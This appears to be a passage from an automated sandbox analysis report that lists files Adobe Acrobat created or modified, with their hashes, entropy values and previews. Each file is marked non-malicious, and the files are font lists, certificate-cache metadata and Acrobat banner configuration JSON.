SHA-512:	5DBD684A9D6E39E4EADE286F7BB32428B4D9D05AD24F7B3D5759B6A24D87203074910E5291F4439DF828F5589156555A3837B22048B0E8084F3FA8EE8CCDDE15
Malicious:	false
Preview:	p...... .........7...Q..(....................................................... ..........W.....U..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.253995428229511
Encrypted:	false
SSDEEP:	6:kK2+i9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:hdDImsLNkPlE99SNxAhUe/3
MD5:	3536FEE5E8BE71C35ACB70E90AF7FE20
SHA1:	89D4FD874EAB7BBFA87997B26376D3FE72CD78A6
SHA-256:	0284A81800BF4A72AD526B2D81D7AA7C1B6151AC7DC460E49F1973DAA3F703B3
SHA-512:	911BC4B5792748AF6A3D05BE11735AF9FD00F8EA095913E81964E1FC11CA7112CCEA465738EE8B87CD16C7DE94BAED1860183637A91CD4409CA9BA1FB0B71E14
Malicious:	false
Preview:	p...... ...........%.Q..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7676

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7676

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.376498671728661
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJM3g98kUwPeUkwRe9:YvXKXPLZc0vjz2sGMbLUkee9
MD5:	EABF8CF23CB4BA9601D372E2D4F306F9
SHA1:	B36881439861041E3FA7F03BD63981B46EABFBBD
SHA-256:	F1D1A619612C079F03466E3841DC05939BDAD38600EC02096A3FB291E2399850
SHA-512:	8D7787585CEF0757F6D51739D0A0D94D0FF654E643BCC43C4B7705C3220BD657CDE5D6EA2E87C00E3D292977CE71F14EF73BABB12C7BCD7CCDF5F8DE807DD48B
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.3252289141658995
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJfBoTfXpnrPeUkwRe9:YvXKXPLZc0vjz2sGWTfXcUkee9
MD5:	A3165BD15BB1FCCD667B649F6DF12EC9
SHA1:	3D19D09620A85EC37DD436E433FDD860DD6C6585
SHA-256:	FCB360441CBB31EDC03BA59D72A7BB89BE0D058FEF802D18ACF970C9C28093F8
SHA-512:	4F87FFBFB0555A830803D0663E0C93F68BC159999B2B6748479073C63539181F629A90374334C6ECA228199DFBF0762BB268C63D3399B4996215711544BFE1D6
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.303079007742969
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJfBD2G6UpnrPeUkwRe9:YvXKXPLZc0vjz2sGR22cUkee9
MD5:	E7DFC27812BC292AE7453C531D3C000B
SHA1:	120E6B8F8FBD77688078B314DC19C3373D509430
SHA-256:	0B29CEF88C6821AA0B98B7FB971FFE84681832DA7A915EDCD6CFCCE73DF8609D
SHA-512:	6C97AA1510004ADF7920CFBE3D1373DA93147EE2F97EAFA7754FB3C0FFE05AE677AEDE3815DDDB9A1549E618245DD34AFBF5FAA9538D42F1776A9B77295ACF7B
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.36397006513124
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJfPmwrPeUkwRe9:YvXKXPLZc0vjz2sGH56Ukee9
MD5:	97B789558DC8A55CEFE00C642D1300A7
SHA1:	52D03D1C1378D8712039C05267A0D974B9D7DC04
SHA-256:	539AD016314DCF471EC24213FF114EA956744685618DA88B0ED1D6A9494D17EE
SHA-512:	89D77B62C0ABF0DF58E176A559074E48C4BEC2E8AB6B1BC05ED268C624D95E9001239D87D70FBF661C72CAF1F1EC55FF00023FC68D4905EA6D441D4B619C4E1B
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.687668829755211
Encrypted:	false
SSDEEP:	24:Yv6Xzzvn+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSd:YvYGhgy6SAFv5Ah8cv/d
MD5:	B781AAC6FA614E12F48655014AAD3CE2
SHA1:	6EB19C76BCEA1839632522E780CD7CF37EB7F741
SHA-256:	7189098AA46DDE477CC8A218EBB17F16929820CBACA11850DCFBE4BC444350C1
SHA-512:	A974EAE14774B49DF0101270C80695CD69F5576EB521F69166CD550A6AFF302427F56DA2CC31C39EDC4ED9B9BC0EFA62F69EF2B3861A6D6895F76C77F1337210
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.311338282182464
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJf8dPeUkwRe9:YvXKXPLZc0vjz2sGU8Ukee9
MD5:	3B9D3F01ED41CADA5736F0751EC923FF
SHA1:	2395C672F49F032D47521961AC24C81DED5C1741
SHA-256:	80D6EAE5E6BC2E25175A49BB8205C5DD152410DEA06C95D2CE7BDE05875747B3
SHA-512:	60641500D9D7745EB4AE2530F74C09D9F6A49E1A17E202E7517A97725B7D1FA6AA46205060CC2FF16B7B9BF69E2ABC24E6EFB074394F944ED5589C8CA0781932
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.315413228001672
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJfQ1rPeUkwRe9:YvXKXPLZc0vjz2sGY16Ukee9
MD5:	5D52CD591F802923E53D5E4B362BD81C
SHA1:	84DCFBF2B774C6150CB6CFE3AE65071A635E0D36
SHA-256:	FC35FD36CF59FC2C6F55E9E1D3709228B47911A44581D15FAD236EA4EDC89079
SHA-512:	70394DA7DBBAA15DF9DFC625BE9EF2A3A683E474116863A946BB141A92B54C593B2458C9298A812DC3C6084A45CD4C5DDDF14526FA1CE80AC3114D89FBD4466E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.322100983551155
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJfFldPeUkwRe9:YvXKXPLZc0vjz2sGz8Ukee9
MD5:	6EE8CB647CF0B4ECA96B076E85E05279
SHA1:	CA8A23C8BCEEAE281888E77F91DFDF8951EDC937
SHA-256:	734FC697879EA59353570074918AC3B6C23C25182B22A5B5CF15E2C77F7B3ED8
SHA-512:	71F710BB43CE8E8AF293C28185B9FC3FBE56EA5816DC89F17935BA6BC2513575B2F2F19A593DC06B37B278016E5DE394ED72A2FD4DDF24A3964906109A761F22
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.337359861553062
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJfzdPeUkwRe9:YvXKXPLZc0vjz2sGb8Ukee9
MD5:	AC4B9D52074E90F904FEA3555311080E
SHA1:	BFF44E4ABF718C11542F7888D73B3CBD41D85E92
SHA-256:	B58DF900C89AED84AD0968D25D7482DC94EED7C3ECEFEB75A2FBE5086743F325
SHA-512:	8B8FF703C61CB7F052DFE665BA4B516C77FEEC2029B593A2C1579ADE4C93A6D0B42EF888A48CB94C9AD044327A65FDD9621BE4682593B69BD4FDBC0A450F9756
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.3183772286997835
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJfYdPeUkwRe9:YvXKXPLZc0vjz2sGg8Ukee9
MD5:	6FB398A3E99F3F63617B321AAC2302C8
SHA1:	D8BFF57CF8966D08C700AF90D235AE0A13D78A74
SHA-256:	E02567500EC6C30BF61FB0992B6B3D96E043381BCA8EB521DC8D6939768CE40E
SHA-512:	C56FE679970F4E69E3E4D23CBAA7AFDDA4D2D04BFFD293F33E6D48D3E2B52B70FB9855E411ABA7B9866DD1B93D07190FCB1C249C5CB65719C06AFDB5530BDE1C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.3047511442814566
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJf+dPeUkwRe9:YvXKXPLZc0vjz2sG28Ukee9
MD5:	C0FB1A270264426D0537AE67AE095793
SHA1:	6AA874148901BDB3BFB5080E89CA9697F9C96871
SHA-256:	94F0FAF21F3ECDAD745031FB050AF051247013F96B46E73545EC83FA5472E60D
SHA-512:	B0CC37DD6028E8DDB43410E9B4D91824BB707AFF16F8FFBCBA62B38812BCD54517E2C7DD9D243B02452A857B1B65C08801D6BF9D6D31EE5C86A89BDC4070248E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.301798022396329
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJfbPtdPeUkwRe9:YvXKXPLZc0vjz2sGDV8Ukee9
MD5:	6CD2B8CCF417B7CCB61B16E980E8427E
SHA1:	0FF3705978BACD87730DCBD782B31710F6D35D10
SHA-256:	3DBC44512214C412DE65336037C2340DF713378081C01D317693032B87FC5525
SHA-512:	DDD25DBFDC44BE4D1B8BA1B254C1CBC65637B973BE19F26B8F207C0E7E4553106DDBB1A21C566CCFFA054E30D02422D30CC6DC9D85A6277C281A4EE9C5D7D66A
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.306703843321368
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJf21rPeUkwRe9:YvXKXPLZc0vjz2sG+16Ukee9
MD5:	E557ADDA75504ECF688EED057C7DE0DF
SHA1:	B7708BE7231E1A56B5D30252497D3D5991B0C8D6
SHA-256:	9B499B43318D36DDF38F0D536851F7762E81828B345C3E881DB61E086E4AC354
SHA-512:	7AC5ABF1C3AFF400BF21CB8AD1D9E73D9E34AE966C1CEAF8218372BF04F916127C9EC6CFCF0544164E2C8C1775668787A5B56F0B6087B941D9D676E6CC2BAAF4
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

